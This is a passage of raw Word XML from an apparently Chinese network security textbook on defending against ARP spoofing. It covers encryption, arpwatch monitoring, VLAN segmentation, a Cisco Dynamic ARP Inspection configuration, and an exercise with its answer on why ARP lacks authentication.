        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">端到端加密（TLS/SSH/IPsec）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">即使流量被</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MITM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">截获，攻击者无法解密</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> TLS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">加密的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP（HTTPS）、SSH</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">加密的远程会话或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IPsec VPN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务端+客户端</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">不适用遗留明文服务；需配合</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> CA </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">体系防</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> TLS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">中间人；DNS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> over </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTPS（DoH）可进一步保护</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> DNS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">监控层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">异常</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">监控（蓝队</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SOC）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">使用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">arpwatch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">arpon</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等工具或自研</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IDS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">规则（前指卷五</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Snort/Suricata）监控局域网内异常的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">行为：同一</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">对应的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MAC </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">频繁变化、大量无偿</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">应答、非预期子网</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MAC-OUI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">镜像端口/终端代理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">告警需专人处置；大规模网络中误报率需谨慎管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">架构层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">网络分段（VLAN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ACL）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">将不同安全等级的终端划分到不同</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">VLAN，限制广播域大小，使攻击者即使在一个</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VLAN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">内实施</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ARP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">欺骗，也无法触及另一个</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> VLAN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">核心/分布层</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">需配合路由间</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ACL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">防火墙实现微隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在部署了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arpwatch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的网段中，ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗行为会触发如下特征的告警：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“flip-flop”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：某</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址在短时间内反复变化。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“bogon”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：出现不应存在于本地网段的非法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“new station”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首次出现在网段中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cisco IOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交换机上的典型配置（因硬件厂商和软件版本而异）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP Snooping</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip dhcp snooping</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip dhcp snooping vlan &lt;VLAN_ID&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在信任端口（连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的端口）上</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">interface &lt;TRUST_INT&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ip dhcp snooping trust</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip arp inspection vlan &lt;VLAN_ID&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">非信任端口主机使用静态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，需手动绑定</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp access-list ARP-STATIC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> permit ip host &lt;IP&gt; mac host &lt;MAC&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip arp inspection filter ARP-STATIC vlan &lt;VLAN_ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者必须理解：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端到端加密（TLS、SSH）是最根本的防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">措施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——即使攻击者成功执行了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗，也无法解密经过正确配置的加密流量。但在实际环境中，遗留明文协议（Telnet、FTP、HTTP、SMTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）仍然广泛存在，特别是内网管理接口、IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备、工业控制系统等场景。因此，链路层和终端层的防御同样不可或缺。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="114"/>
    <w:bookmarkEnd w:id="115"/>
    <w:bookmarkStart w:id="116" w:name="习题-6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1（回忆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗原理）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议为何可以轻易被欺骗？从协议设计假设的角度说明，至少列出两个协议层面缺乏的安全机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文结构（RFC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">826）：有无认证字段？请求与应答的关联方式是什么？操作系统对无偿</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的处理策略是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议可以被欺骗的根本原因在于其设计之初假设局域网是一个“可信域”，因而缺少以下安全机制：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答不含任何来源认证信息（无数字签名、无挑战-响应机制、无完整性校验码），任何主机可以声称任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP-MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无状态验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是无状态协议，主机接受“无偿</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答”更新缓存，而不检查该应答是否是自己发出的请求的回应。操作系统通常将最新收到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息视为有效。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">广播域内全信任</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文在广播域内任意发送，无访问控制列表限制谁可以发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
